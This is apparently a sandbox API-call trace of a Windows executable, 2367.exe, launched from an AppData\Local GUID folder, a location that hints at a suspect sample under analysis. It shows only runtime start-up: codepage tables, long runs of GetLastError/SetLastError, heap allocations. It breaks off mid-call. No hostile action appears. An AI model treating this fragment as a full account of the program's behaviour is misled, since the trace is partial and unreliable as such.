cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ໴押@Ā") returned 256 [0121.905] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ໴押@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0121.905] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ໴押@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0121.905] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ³Ñ®÷\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0121.905] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x4aeee0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1e0f3478-f5c6-4d34-8528-dedd9dcd2df7\\2367.exe")) returned 0x59 [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.905] SetLastError (dwErrCode=0x0) [0121.905] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.906] SetLastError (dwErrCode=0x0) [0121.906] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.907] SetLastError (dwErrCode=0x0) [0121.907] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.908] GetLastError () returned 0x0 [0121.908] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.909] GetLastError () returned 0x0 [0121.909] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.910] SetLastError (dwErrCode=0x0) [0121.910] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.911] SetLastError (dwErrCode=0x0) [0121.911] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.912] GetLastError () returned 0x0 [0121.912] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x0, Size=0x6d) returned 0x4a51990 [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.913] SetLastError (dwErrCode=0x0) [0121.913] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.914] SetLastError (dwErrCode=0x0) [0121.914] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.915] SetLastError (dwErrCode=0x0) [0121.915] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.916] SetLastError (dwErrCode=0x0) [0121.916] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.917] GetLastError () returned 0x0 [0121.917] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.918] GetLastError () returned 0x0 [0121.918] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.919] GetLastError () returned 0x0 [0121.919] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.920] SetLastError (dwErrCode=0x0) [0121.920] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.921] SetLastError (dwErrCode=0x0) [0121.921] GetLastError () returned 0x0 [0121.922] SetLastError (dwErrCode=0x0) [0121.922] GetLastError () returned 0x0 [0121.922] SetLastError (dwErrCode=0x0) [0121.922] GetLastError () returned 0x0 [0121.922] SetLastError (dwErrCode=0x0) [0121.922] GetLastError () returned 0x0 [0121.922] SetLastError (dwErrCode=0x0) [0121.922] GetLastError () returned 0x0 [0121.922] SetLastError (dwErrCode=0x0) [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x98) returned 0x4a51a08 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x1f) returned 0x4a51aa8 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x36) returned 0x4a51ad0 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x37) returned 0x4a51b10 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x3c) returned 0x4a51b50 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x31) returned 0x4a51b98 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x17) returned 0x4a51bd8 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x24) returned 0x4a51bf8 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x14) returned 0x4a51c28 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0xd) returned 0x4a51c48 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x25) returned 0x4a51c60 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x39) returned 0x4a51c90 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x18) returned 0x4a51cd8 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x17) returned 0x4a51cf8 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0xe) returned 0x4a51d18 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x69) returned 0x4a51d30 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x3e) returned 0x4a51da8 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x1b) returned 0x4a51df0 [0121.922] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x1d) returned 0x4a51e18 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x48) returned 0x4a51e40 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x12) returned 0x4a51e90 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x18) returned 0x4a51eb0 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x1b) returned 0x4a51ed0 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x24) returned 0x4a51ef8 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x29) returned 0x4a51f28 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x1e) returned 0x4a51f60 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x41) returned 0x4a51f88 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x17) returned 0x4a51fd8 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0xf) returned 0x4a51ff8 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x16) returned 0x4a52010 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x2a) returned 0x4a52030 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x29) returned 0x4a52068 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x15) returned 0x4a520a0 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x1e) returned 0x4a520c0 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x2a) returned 0x4a520e8 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x12) returned 0x4a52120 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x18) returned 0x4a52140 [0121.923] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x46) returned 0x4a52160 [0121.923] HeapFree (in: hHeap=0x4a50000, dwFlags=0x0, lpMem=0x4a511f8 | out: hHeap=0x4a50000) returned 1 [0121.923] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0121.923] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0121.923] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0121.925] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x80) returned 0x4a511f8 [0121.925] RtlAllocateHeap (HeapHandle=0x4a50000, Flags=0x8, Size=0x800) returned 0x4a521b0 [0121.925] RtlSizeHeap (HeapHandle=0x4a50000, Flags=0x0, MemoryPointer=0x4a511f8) returned 0x80 [0121.926] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40b5f8) returned 0x0 [0121.926] RtlSizeHeap (HeapHandle=0x4a50000, Flags=0x0, MemoryPointer=0x4a511f8) returned 0x80 [0121.927] RtlSizeHeap (HeapHandle=0x4a50000, Flags=0x0, MemoryPointer=0x4a511f8) returned 0x80 [0121.927] RtlSizeHeap (HeapHandle=0x4a50000, Flags=0x0, MemoryPointer=0x4a511f8) returned 0x80 [0121.928] RtlSizeHeap (HeapHandle=0x4a50000, Flags=0x0, MemoryPointer=0x4a511f8) returned 0x80 [0121.928] RtlSizeHeap 